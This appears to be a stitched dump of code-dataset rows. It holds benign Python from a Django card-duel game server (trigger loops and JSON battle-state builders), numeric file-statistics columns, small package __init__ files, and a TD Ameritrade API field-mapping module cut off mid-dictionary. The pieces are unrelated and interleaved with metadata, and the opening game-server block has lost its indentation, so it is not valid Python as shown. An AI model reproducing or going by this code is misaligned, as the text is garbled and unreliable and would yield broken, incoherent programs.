duel.mute = 0
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.timing2 is not None:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
elif duel.timing is not None:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
if duel.timing is None:
duelobj.timing_mess = {}
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
pprint("GGG")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
choices2 = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
other_user,
user,
)
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
and choices[0] is None
and choices2[0] is None
):
duel.current_priority = duelobj.max2(choices,choices2)
if duel.current_priority == 0:
pprint("HHH")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices2 = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, other_user, user
)
flag2 = duelobj.invoke_trigger_waiting(duel.trigger_waiting, duel.current_priority)
duelobj.update = True
if not flag2:
duel.in_trigger_waiting = False
'''
現状意味不明
if duelobj.check_wait(user) and duel.is_ai is True:
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if choices[0]:
duel.appoint = 1
flag = False
flag_3 = True
break
'''
if flag_2 is True:
break
if( choices[0] is not None
and choices[0] is not True
and duel.appoint == user
and not duelobj.check_wait(user)):
duel.current_priority = choices[1]
duelobj.update = True
elif (
duel.in_cost is True
or
(choices[0] is not None
and choices[0] is not True
and duel.appoint == user
and duelobj.check_wait(user))
or duel.ask != 0
or duel.winner != 0
or duel.winner_ai != 0
):
break
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
):
duel.current_priority = duelobj.max2(choices, choices2)
if duel.current_priority == 0:
pprint("III")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
flag2 = duelobj.invoke_trigger_waiting(duel.trigger_waiting, duel.current_priority)
duelobj.update = True
if not flag2:
duel.in_trigger_waiting = False
if choices[1] >= choices2[1]:
duel.appoint = 1
else:
duel.appoint = 2
if duelobj.update is True:
duelobj.save_all(user, other_user, room_number)
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
def battle_det_return(
    duelobj, decks, graves, hands, user, other_user, choices, room_number
):
    """Build the in-progress battle-state JSON response for one player.

    Serializes the current duel (logs, display names, zone snapshots,
    pending-question flags, clocks) from the perspective of ``user`` and
    returns it as an HttpResponse containing JSON.  If a winner has already
    been decided, delegates to ``battle_det_return_org`` instead.

    ``choices`` is the (choice, priority) pair produced by ``check_trigger``;
    ``user`` / ``other_user`` are the two seat numbers (1 or 2).
    ``room_number`` is unused here (kept for signature parity with callers).
    """
    duel = duelobj.duel
    # Duel already decided -> use the end-of-duel response instead.
    if duel.winner != 0 or duel.winner_ai != 0:
        return battle_det_return_org(
            duelobj, decks, graves, hands, user, other_user, choices, room_number
        )
    return_value = {}
    # Prefer the in-memory log on duelobj over the persisted duel.current_log.
    if duelobj.current_log != "":
        return_value["current_log"] = escape(duelobj.current_log)
    else:
        return_value["current_log"] = escape(duel.current_log)
    return_value["variable"] = duelobj.get_variables()
    return_value["phase"] = duel.phase.id
    # "turn" is reported from the requester's perspective: player 2 sees the
    # seat numbers swapped.
    if duelobj.user == 1:
        return_value["turn"] = duel.user_turn
    else:
        if(duel.user_turn == 1):
            return_value["turn"] = 2
        else:
            return_value["turn"] = 1
    return_value["log"] = escape(duel.log_turn)
    return_value["message_log"] = escape(duel.message_log)
    # ask_org: whether ANY question is pending, regardless of who is asked.
    if duel.ask > 0:
        return_value["ask_org"] = True
    else:
        return_value["ask_org"] = False
    # Display names: guests use the stored guest name; an AI opponent shows
    # as "NPC".  name1 is always "this client", name2 the opponent.
    if duelobj.user == 1:
        if duel.guest_flag is False:
            return_value["user_name1"] = escape(duel.user_1.first_name)
        else:
            return_value["user_name1"] = escape(duel.guest_name)
        if duel.is_ai is False:
            if duel.guest_flag2 is False:
                return_value["user_name2"] = escape(duel.user_2.first_name)
            else:
                return_value["user_name2"] = escape(duel.guest_name2)
        else:
            return_value["user_name2"] = "NPC"
    else:
        if duel.is_ai is False:
            if duel.guest_flag2 is False:
                return_value["user_name1"] = escape(duel.user_2.first_name)
            else:
                return_value["user_name1"] = escape(duel.guest_name2)
        else:
            return_value["user_name1"] = "NPC"
        if duel.guest_flag is False:
            return_value["user_name2"] = escape(duel.user_1.first_name)
        else:
            return_value["user_name2"] = escape(duel.guest_name)
    # "ask": whether THIS client is the one being asked (ask==1 targets the
    # turn player, ask==2 the non-turn player, ask==3 both).
    if duelobj.user == duel.user_turn:
        if duel.ask == 1 or duel.ask == 3:
            return_value["ask"] = True
        else:
            return_value["ask"] = False
    else:
        if duel.ask == 2 or duel.ask == 3:
            return_value["ask"] = True
        else:
            return_value["ask"] = False
    return_value["ask_det"] = duel.ask_det
    return_value["user"] = user
    return_value["other_user"] = other_user
    # "appoint" is only emitted when the appointment is held by one of the
    # two seats (otherwise the key is absent).
    if duel.appoint == user:
        return_value["appoint"] = True
    elif duel.appoint == other_user:
        return_value["appoint"] = False
    # Zone snapshots; when this player holds the appointment the snapshots
    # are post-processed (modify_*) using the current choice priority
    # choices[1].  Deep copies keep the cached originals untouched.
    deck_info = duelobj.get_deck_info(decks, user, other_user, 1)
    return_value["deck_info"] = copy.deepcopy(deck_info)
    if duel.appoint == user:
        return_value["deck_info"] = duelobj.modify_deck_info(
            return_value["deck_info"], duelobj.count_deck(decks), user, other_user, choices[1]
        )
    return_value["grave_info"] = duelobj.get_grave_info(graves, user, other_user, 1)
    if duel.appoint == user:
        return_value["grave_info"] = duelobj.modify_grave_info(
            return_value["grave_info"], graves.count(), user, other_user, choices[1]
        )
    hand_info = duelobj.get_hand_info(hands, user, other_user, 1)
    return_value["hand_info"] = copy.deepcopy(hand_info)
    if duel.appoint == user:
        return_value["hand_info"] = duelobj.modify_hand_info(
            return_value["hand_info"], hands.count(), user, other_user, choices[1]
        )
    field = duelobj.field
    return_value["field_info"] = copy.deepcopy(field)
    # NOTE(review): both branches below are identical — field info is always
    # modified regardless of who holds the appointment; confirm whether the
    # else-branch was meant to differ.
    if duel.appoint == user:
        return_value["field_info"] = duelobj.modify_field_info(
            return_value["field_info"], user, other_user, choices[1]
        )
    else:
        return_value["field_info"] = duelobj.modify_field_info(
            return_value["field_info"], user, other_user, choices[1]
        )
    # "pri": this client may act now — either a priority timing is active
    # with an available choice and no pending question, or a chain is in
    # progress, or the current phase itself grants priority.
    if (
        (
            (duel.timing is not None and duel.timing.pri is True)
            or (duel.timing2 is not None and duel.timing2.pri is True)
            or (duel.timing3 is not None and duel.timing3.pri is True))
        and duel.appoint == user
        and duel.ask == 0
        and choices[0] is not None
        and duelobj.check_wait(user)
    ) or (duel.chain > 0 and duel.ask == 0 and duel.appoint == user)\
        or (duel.ask == 0 and duel.appoint == user and duel.phase.pri is True):
        return_value["pri"] = True
    else:
        return_value["pri"] = False
    return_value["choices"] = choices[0]
    # Pending sound effect is handed to its player exactly once, then cleared
    # and persisted so it does not replay on the next poll.
    if user == 1:
        if duel.sound_effect_1 != "":
            return_value["sound_effect"] = duel.sound_effect_1
            duel.sound_effect_1 = ""
            duel.save();
        else:
            return_value["sound_effect"] = ""
    elif user == 2:
        if duel.sound_effect_2 != "":
            return_value["sound_effect"] = duel.sound_effect_2
            duel.sound_effect_2 = ""
            duel.save();
        else:
            return_value["sound_effect"] = ""
    return_value["audio"] = duel.audio
    config = Config.objects.get()
    limit_time = config.limit_time
    # "koka" (effect display data) is suppressed while the duel is muted.
    if duel.mute ==0 :
        return_value["koka"] = duelobj.get_koka()
    else:
        return_value["koka"] = {}
    # Remaining clock per player: limit minus elapsed wall time; time_1 is
    # always the requesting player's own clock.
    if user == 1:
        return_value["time_1"] = limit_time - (time() - duel.time_1)
        return_value["time_2"] = limit_time - (time() - duel.time_2)
    else:
        return_value["time_1"] = limit_time - (time() - duel.time_2)
        return_value["time_2"] = limit_time - (time() - duel.time_1)
    return_value["winner"] = False
    return HttpResponse(json.dumps(return_value))
def battle_det_return_org(
    duelobj, decks, graves, hands, user, other_user, choices, room_number
):
    """Build the end-of-duel JSON response (a winner has been decided).

    Unlike ``battle_det_return``: timers are zeroed, the hand snapshot uses
    detail level 3 instead of 1 (presumably revealing the opponent's hand at
    duel end — confirm against ``get_hand_info``), and ``winner`` /
    ``winner_who`` are included so the client can show the result screen.

    ``choices`` is the (choice, priority) pair from ``check_trigger`` or
    ``None``; ``user`` / ``other_user`` are the seat numbers (1 or 2).
    ``room_number`` is unused here (kept for signature parity with the other
    battle_det_return_* builders).  Returns an HttpResponse with a JSON body.
    """
    if choices is None:
        # Sentinel pair: no choice available, lowest-urgency priority.
        choices = [None, 10000]
    duel = duelobj.duel
    return_value = {}
    # Prefer the in-memory log on duelobj over the persisted duel.current_log.
    if duelobj.current_log != "":
        return_value["current_log"] = escape(duelobj.current_log)
    else:
        return_value["current_log"] = escape(duel.current_log)
    return_value["variable"] = duelobj.get_variables()
    return_value["phase"] = duel.phase.id
    return_value["turn"] = duel.user_turn
    return_value["log"] = escape(duel.log_turn)
    return_value["message_log"] = escape(duel.message_log)
    # ask_org: whether ANY question is still pending.
    return_value["ask_org"] = duel.ask > 0
    # Display names: guests use the stored guest name; an AI opponent shows
    # as "NPC".  name1 is always "this client", name2 the opponent.
    if duelobj.user == 1:
        if duel.guest_flag is False:
            return_value["user_name1"] = escape(duel.user_1.first_name)
        else:
            return_value["user_name1"] = escape(duel.guest_name)
        if duel.is_ai is False:
            if duel.guest_flag2 is False:
                return_value["user_name2"] = escape(duel.user_2.first_name)
            else:
                return_value["user_name2"] = escape(duel.guest_name2)
        else:
            # BUGFIX: previously no name was set on this path, so an AI duel
            # left "user_name2" missing from the response entirely.  Both
            # battle_det_return and battle_det_return_org_ai emit "NPC" here.
            return_value["user_name2"] = "NPC"
    else:
        if duel.is_ai is False:
            if duel.guest_flag2 is False:
                return_value["user_name1"] = escape(duel.user_2.first_name)
            else:
                return_value["user_name1"] = escape(duel.guest_name2)
        else:
            return_value["user_name1"] = "NPC"
        if duel.guest_flag is False:
            return_value["user_name2"] = escape(duel.user_1.first_name)
        else:
            return_value["user_name2"] = escape(duel.guest_name)
    return_value["ask_det"] = duel.ask_det
    return_value["user"] = user
    return_value["other_user"] = other_user
    # "appoint" is only emitted when the appointment is held by one of the
    # two seats (otherwise the key is absent).
    if duel.appoint == user:
        return_value["appoint"] = True
    elif duel.appoint == other_user:
        return_value["appoint"] = False
    # Zone snapshots; deep copies keep the cached originals untouched.
    return_value["deck_info"] = copy.deepcopy(
        duelobj.get_deck_info(decks, user, other_user, 1)
    )
    return_value["grave_info"] = duelobj.get_grave_info(graves, user, other_user, 1)
    # Detail level 3 here (the in-progress builder uses 1).
    return_value["hand_info"] = copy.deepcopy(
        duelobj.get_hand_info(hands, user, other_user, 3)
    )
    return_value["field_info"] = copy.deepcopy(duelobj.field)
    # "pri": this client may act — a priority timing is active with an
    # available choice and no pending question, or a chain is in progress,
    # or the phase grants priority to the non-turn player.
    if (
        ((duel.timing is not None and duel.timing.pri is True)
            or (duel.timing2 is not None and duel.timing2.pri is True)
            or (duel.timing3 is not None and duel.timing3.pri is True))
        and duel.appoint == user
        and duel.ask == 0
        and choices[0] is not None and duelobj.check_wait(user)
    ) or (duel.chain > 0 and duel.ask == 0 and duel.appoint == user)\
        or (duel.ask == 0 and duel.user_turn != user and duel.appoint == user and duel.phase.pri is True):
        return_value["pri"] = True
    else:
        return_value["pri"] = False
    # choices was normalized above so it is never None here; internal
    # "monster_trigger" placeholders are hidden from the client.
    if choices[0] == "monster_trigger":
        return_value["choices"] = None
    else:
        return_value["choices"] = choices[0]
    # Pending sound effect is handed to its player exactly once, then cleared
    # and persisted so it does not replay on the next poll.
    if user == 1:
        if duel.sound_effect_1 != "":
            return_value["sound_effect"] = duel.sound_effect_1
            duel.sound_effect_1 = ""
            duel.save()
        else:
            return_value["sound_effect"] = ""
    elif user == 2:
        if duel.sound_effect_2 != "":
            return_value["sound_effect"] = duel.sound_effect_2
            duel.sound_effect_2 = ""
            duel.save()
        else:
            return_value["sound_effect"] = ""
    return_value["audio"] = duel.audio
    return_value["koka"] = duelobj.get_koka()
    # Clocks are meaningless once the duel has ended.
    return_value["time_1"] = 0
    return_value["time_2"] = 0
    return_value["winner"] = True
    # Prefer the human-decided winner; fall back to the AI-decided one.
    return_value["winner_who"] = duel.winner if duel.winner != 0 else duel.winner_ai
    return HttpResponse(json.dumps(return_value))
def battle_det_return_org_ai(
    duelobj, decks, graves, hands, user, other_user, choices, room_number
):
    """Build the battle-state JSON response sent while the AI opponent acts.

    Mirrors the other battle_det_return_* builders but with every interactive
    element disabled: no pending question (``ask`` / ``ask_org`` False), no
    priority, no selectable choices, zeroed clocks, and ``waiting_ai`` set so
    the client keeps polling.  Returns an HttpResponse with a JSON body.
    """
    duel = duelobj.duel
    # Re-apply continuous effects before the snapshot is serialized.
    duelobj.check_eternal_effect(
        decks, graves, hands, duel.phase, duel.user_turn, user, other_user
    )
    payload = {}
    # Prefer the in-memory log on duelobj over the persisted duel.current_log.
    if duelobj.current_log != "":
        payload["current_log"] = escape(duelobj.current_log)
    else:
        payload["current_log"] = escape(duel.current_log)
    payload["variable"] = duelobj.get_variables()
    payload["phase"] = duel.phase.id
    payload["turn"] = duel.user_turn
    payload["log"] = escape(duel.log_turn)
    payload["message_log"] = escape(duel.message_log)
    # Nothing is asked of the player while the AI is taking its turn.
    payload["ask_org"] = False
    payload["ask"] = False
    # Display names: guests use the stored guest name; the AI shows as "NPC".
    if duelobj.user == 1:
        if duel.guest_flag is False:
            payload["user_name1"] = escape(duel.user_1.first_name)
        else:
            payload["user_name1"] = escape(duel.guest_name)
        payload["user_name2"] = "NPC"
    else:
        if duel.is_ai == False:
            if duel.guest_flag2 is False:
                payload["user_name1"] = escape(duel.user_2.first_name)
            else:
                payload["user_name1"] = escape(duel.guest_name2)
        else:
            payload["user_name1"] = "NPC"
        if duel.guest_flag is False:
            payload["user_name2"] = escape(duel.user_1.first_name)
        else:
            payload["user_name2"] = escape(duel.guest_name)
    payload["ask_det"] = 0
    payload["user"] = user
    payload["other_user"] = other_user
    # "appoint" is only emitted when the appointment belongs to one of the
    # two seats (otherwise the key is absent).
    if duel.appoint == user:
        payload["appoint"] = True
    elif duel.appoint == other_user:
        payload["appoint"] = False
    # Zone snapshots; deep copies keep the cached originals untouched.
    payload["deck_info"] = copy.deepcopy(
        duelobj.get_deck_info(decks, user, other_user, 1)
    )
    payload["grave_info"] = duelobj.get_grave_info(graves, user, other_user, 1)
    payload["hand_info"] = copy.deepcopy(
        duelobj.get_hand_info(hands, user, other_user, 1)
    )
    payload["field_info"] = copy.deepcopy(duelobj.field)
    payload["pri"] = False
    payload["choices"] = None
    # Pending sound effect is handed to its player once and cleared in memory
    # (not persisted here, unlike the non-AI builders).
    if user in (1, 2):
        attr = "sound_effect_1" if user == 1 else "sound_effect_2"
        effect = getattr(duel, attr)
        if effect != "":
            payload["sound_effect"] = effect
            setattr(duel, attr, "")
        else:
            payload["sound_effect"] = ""
    payload["audio"] = duel.audio
    payload["koka"] = []
    payload["time_1"] = 0
    payload["time_2"] = 0
    # Signals the client that the AI is still acting and it should poll again.
    payload["waiting_ai"] = 1
    return HttpResponse(json.dumps(payload))
| 48.169867
| 140
| 0.421729
| 6,090
| 65,222
| 4.326108
| 0.026437
| 0.035072
| 0.035527
| 0.034161
| 0.907576
| 0.875465
| 0.83599
| 0.810825
| 0.7942
| 0.776437
| 0
| 0.021397
| 0.505581
| 65,222
| 1,353
| 141
| 48.205469
| 0.795609
| 0.002346
| 0
| 0.783005
| 0
| 0
| 0.024477
| 0.000651
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003794
| false
| 0.003794
| 0.009105
| 0
| 0.036419
| 0.008346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
451164a71400ced2bc33c7c7685bd00d4a9308e1
| 86
|
py
|
Python
|
wikihow_crawler/__init__.py
|
chinodyt/wikihow_crawler
|
f00fd6c425fe498e8928f7d487a9ce7e1b887e04
|
[
"MIT"
] | null | null | null |
wikihow_crawler/__init__.py
|
chinodyt/wikihow_crawler
|
f00fd6c425fe498e8928f7d487a9ce7e1b887e04
|
[
"MIT"
] | null | null | null |
wikihow_crawler/__init__.py
|
chinodyt/wikihow_crawler
|
f00fd6c425fe498e8928f7d487a9ce7e1b887e04
|
[
"MIT"
] | null | null | null |
from .crawler import Crawler
from .crawler import HowToPage
from .util import Settings
| 28.666667
| 30
| 0.837209
| 12
| 86
| 6
| 0.5
| 0.305556
| 0.472222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127907
| 86
| 3
| 31
| 28.666667
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
18da74fa2fb262d52a01b13b7067323afeaefbf5
| 143
|
py
|
Python
|
dataspace/__init__.py
|
Sam-prog-sudo/dataspace
|
2bab85c4dfa713deb835a46e9214c43a3a674082
|
[
"MIT"
] | 3
|
2021-06-28T09:45:51.000Z
|
2022-01-10T15:38:07.000Z
|
dataspace/__init__.py
|
Sam-prog-sudo/dataspace
|
2bab85c4dfa713deb835a46e9214c43a3a674082
|
[
"MIT"
] | null | null | null |
dataspace/__init__.py
|
Sam-prog-sudo/dataspace
|
2bab85c4dfa713deb835a46e9214c43a3a674082
|
[
"MIT"
] | 1
|
2021-07-01T08:50:32.000Z
|
2021-07-01T08:50:32.000Z
|
from dataspace.core import DataSpace
from dataspace.core.env import is_notebook
from dataspace.core.load import from_df, from_csv, from_django
| 35.75
| 62
| 0.853147
| 23
| 143
| 5.130435
| 0.478261
| 0.330508
| 0.432203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097902
| 143
| 3
| 63
| 47.666667
| 0.914729
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a07dd15adff197d5e1923e94a5937b2ad4cb538
| 197
|
py
|
Python
|
Controller/communication/__init__.py
|
Ernstsen/RC-car
|
eda8ec6ae28686380c06f442c889ea89a077315b
|
[
"MIT"
] | null | null | null |
Controller/communication/__init__.py
|
Ernstsen/RC-car
|
eda8ec6ae28686380c06f442c889ea89a077315b
|
[
"MIT"
] | 3
|
2021-03-23T15:13:14.000Z
|
2021-03-23T16:15:20.000Z
|
Controller/communication/__init__.py
|
Ernstsen/RC-car
|
eda8ec6ae28686380c06f442c889ea89a077315b
|
[
"MIT"
] | null | null | null |
from .configuration_utilities import Configurator
from .server_utilities import create_server, connect, send, terminate
__all__ = ["Configurator", "create_server", "connect", "send", "terminate"]
| 39.4
| 75
| 0.791878
| 21
| 197
| 7.047619
| 0.52381
| 0.202703
| 0.256757
| 0.310811
| 0.432432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096447
| 197
| 4
| 76
| 49.25
| 0.831461
| 0
| 0
| 0
| 0
| 0
| 0.228426
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e15df7cbb45629311510f0d0339d612d51329356
| 18,649
|
py
|
Python
|
td/fields.py
|
eyesuk/td-ameritrade-python-api
|
0dcdb8029e0fe4e051a56ad276b1d9c5bc62352a
|
[
"MIT"
] | 1
|
2021-10-01T21:16:24.000Z
|
2021-10-01T21:16:24.000Z
|
td/fields.py
|
bkgrover71/sigma_code_td_ameritrade
|
27dfe6515134646049b5ebaa7f7519efa7a93308
|
[
"MIT"
] | null | null | null |
td/fields.py
|
bkgrover71/sigma_code_td_ameritrade
|
27dfe6515134646049b5ebaa7f7519efa7a93308
|
[
"MIT"
] | null | null | null |
ENDPOINT_ARGUMENTS = {
'search_instruments': {
'projection': ['symbol-search', 'symbol-regex', 'desc-search', 'desc-regex', 'fundamental']
},
'get_market_hours': {
'markets': ['EQUITY', 'OPTION', 'FUTURE', 'BOND', 'FOREX']
},
'get_movers': {
'market': ['$DJI', '$COMPX', '$SPX.X'],
'direction': ['up', 'down'],
'change': ['value', 'percent']
},
'get_user_principals': {
'fields': ['streamerSubscriptionKeys', 'streamerConnectionInfo', 'preferences', 'surrogateIds']
}
}
VALID_CHART_VALUES = {
'minute':{
'day':[1, 2, 3, 4, 5, 10]
},
'daily':{
'month':[1, 2, 3, 6],
'year':[1, 2, 3, 5, 10, 15, 20],
'ytd':[1]
},
'weekly':{
'month':[1, 2, 3, 6],
'year':[1, 2, 3, 5, 10, 15, 20],
'ytd':[1]
},
'monthly':{
'year':[1, 2, 3, 5, 10, 15, 20]
}
}
# Per-service translation tables for streamer messages: the stream sends
# numeric field ids; these map each id (as a string) to a readable name.
# NOTE(review): several values below contain typos or inconsistent naming
# (flagged inline). They are kept verbatim because downstream consumers
# presumably key on the exact strings — confirm before normalizing.
STREAM_FIELD_IDS = {
    "account_activity": {
        "0": "subscription-key",
        "1": "account-id",
        "2": "message-type",
        "3": "message-data"
    },
    "level_one_forex": {
        "0": "symbol",
        "1": "bid-price",
        "2": "ask-price",
        "3": "last-price",
        "4": "bid-size",
        "5": "ask-size",
        "6": "total-volume",
        "7": "last-size",
        "8": "quote-time",
        "9": "trade-time",
        "10": "high-price",
        "11": "low-price",
        "12": "close-price",
        "13": "exchange-id",
        "14": "description",
        "15": "open-price",
        "16": "net-change",
        "17": "percent-change",
        "18": "exchange-name",
        "19": "digits",
        "20": "security-status",
        "21": "tick",
        "22": "tick-amount",
        "23": "product",
        "24": "trading-hours",
        "25": "is-tradable",
        "26": "market-maker",
        "27": "52-week-high",
        "28": "52-week-low",
        "29": "mark"
    },
    "level_one_futures": {
        "0": "symbol",
        "1": "bid-price",
        "2": "ask-price",
        "3": "last-price",
        "4": "bid-size",
        "5": "ask-size",
        "6": "ask-id",
        "7": "bid-id",
        "8": "total-volume",
        "9": "last-size",
        "10": "quote-time",
        "11": "trade-time",
        "12": "high-price",
        "13": "low-price",
        "14": "close-price",
        "15": "exchange-id",
        "16": "description",
        "17": "last-id",
        "18": "open-price",
        "19": "net-change",
        "20": "future-percent-change",
        # NOTE(review): "exhange-name" (sic) — typo kept as-is deliberately.
        "21": "exhange-name",
        "22": "security-status",
        "23": "open-interest",
        "24": "mark",
        "25": "tick",
        "26": "tick-amount",
        "27": "product",
        "28": "future-price-format",
        "29": "future-trading-hours",
        "30": "future-is-tradable",
        "31": "future-multiplier",
        "32": "future-is-active",
        "33": "future-settlement-price",
        "34": "future-active-symbol",
        "35": "future-expiration-date"
    },
    # Identical field layout to "level_one_futures" above.
    "level_one_futures_options": {
        "0": "symbol",
        "1": "bid-price",
        "2": "ask-price",
        "3": "last-price",
        "4": "bid-size",
        "5": "ask-size",
        "6": "ask-id",
        "7": "bid-id",
        "8": "total-volume",
        "9": "last-size",
        "10": "quote-time",
        "11": "trade-time",
        "12": "high-price",
        "13": "low-price",
        "14": "close-price",
        "15": "exchange-id",
        "16": "description",
        "17": "last-id",
        "18": "open-price",
        "19": "net-change",
        "20": "future-percent-change",
        # NOTE(review): "exhange-name" (sic) — typo kept as-is deliberately.
        "21": "exhange-name",
        "22": "security-status",
        "23": "open-interest",
        "24": "mark",
        "25": "tick",
        "26": "tick-amount",
        "27": "product",
        "28": "future-price-format",
        "29": "future-trading-hours",
        "30": "future-is-tradable",
        "31": "future-multiplier",
        "32": "future-is-active",
        "33": "future-settlement-price",
        "34": "future-active-symbol",
        "35": "future-expiration-date"
    },
    "level_one_option": {
        "0": "symbol",
        "1": "description",
        "2": "bid-price",
        "3": "ask-price",
        "4": "last-price",
        "5": "high-price",
        "6": "low-price",
        "7": "close-price",
        "8": "total-volume",
        "9": "open-interest",
        "10": "volatility",
        "11": "quote-time",
        "12": "trade-time",
        "13": "money-intrinsic-value",
        "14": "quote-day",
        "15": "trade-day",
        "16": "expiration-year",
        "17": "multiplier",
        "18": "digits",
        "19": "open-price",
        "20": "bid-size",
        "21": "ask-size",
        "22": "last-size",
        "23": "net-change",
        "24": "strike-price",
        "25": "contract-type",
        "26": "underlying",
        "27": "expiration-month",
        "28": "deliverables",
        "29": "time-value",
        "30": "expiration-day",
        "31": "days-to-expiration",
        "32": "delta",
        "33": "gamma",
        "34": "theta",
        "35": "vega",
        "36": "rho",
        "37": "security-status",
        "38": "theoretical-option-value",
        "39": "underlying-price",
        "40": "uv-expiration-type",
        "41": "mark"
    },
    "level_one_quote": {
        "0": "symbol",
        "1": "bid-price",
        "2": "ask-price",
        "3": "last-price",
        "4": "bid-size",
        "5": "ask-size",
        "6": "ask-id",
        "7": "bid-id",
        "8": "total-volume",
        "9": "last-size",
        "10": "trade-time",
        "11": "quote-time",
        "12": "high-price",
        "13": "low-price",
        "14": "bid-tick",
        "15": "close-price",
        "16": "exchange-id",
        "17": "marginable",
        "18": "shortable",
        "19": "island-bid",
        "20": "island-ask",
        "21": "island-volume",
        "22": "quote-day",
        "23": "trade-day",
        "24": "volatility",
        "25": "description",
        "26": "last-id",
        "27": "digits",
        "28": "open-price",
        "29": "net-change",
        "30": "52-week-high",
        "31": "52-week-low",
        "32": "pe-ratio",
        "33": "dividend-amount",
        "34": "dividend-yield",
        "35": "island-bid-size",
        "36": "island-ask-size",
        "37": "nav",
        "38": "fund-price",
        "39": "exchange-name",
        "40": "dividend-date",
        "41": "regular-market-quote",
        "42": "regular-market-trade",
        "43": "regular-market-last-price",
        "44": "regular-market-last-size",
        "45": "regular-market-trade-time",
        "46": "regular-market-trade-day",
        "47": "regular-market-net-change",
        "48": "security-status",
        "49": "mark",
        "50": "quote-time-in-long",
        "51": "trade-time-in-long",
        "52": "regular-market-trade-time-in-long"
    },
    "news_headline": {
        "0": "symbol",
        "1": "error-code",
        "2": "story-datetime",
        "3": "headline-id",
        "4": "status",
        "5": "headline",
        "6": "story-id",
        "7": "count-for-keyword",
        "8": "keyword-array",
        "9": "is-hot",
        "10": "story-source"
    },
    "qos_request": {
        "0": "express",
        "1": "real-time",
        "2": "fast",
        "3": "moderate",
        "4": "slow",
        "5": "delayed"
    },
    "timesale": {
        "0": "symbol",
        "1": "trade-time",
        "2": "last-price",
        "3": "last-size",
        "4": "last-sequence"
    },
    # NOTE(review): the three chart_* tables below mix hyphenated and
    # underscored names ("close_price", "chart_time", "chart_day") unlike
    # every other table here — looks accidental, but kept verbatim.
    "chart_equity": {
        "seq": "chart-sequence",
        "key": "symbol",
        "1": "open-price",
        "2": "high-price",
        "3": "low-price",
        "4": "close_price",
        "5": "volume",
        "6": "sequence",
        "7": "chart_time",
        "8": "chart_day"
    },
    # Same layout as chart_equity, except "key" maps to "key" not "symbol".
    "chart_options": {
        "seq": "chart-sequence",
        "key": "key",
        "1": "open-price",
        "2": "high-price",
        "3": "low-price",
        "4": "close_price",
        "5": "volume",
        "6": "sequence",
        "7": "chart_time",
        "8": "chart_day"
    },
    "chart_futures": {
        "seq": "chart-sequence",
        "key": "key",
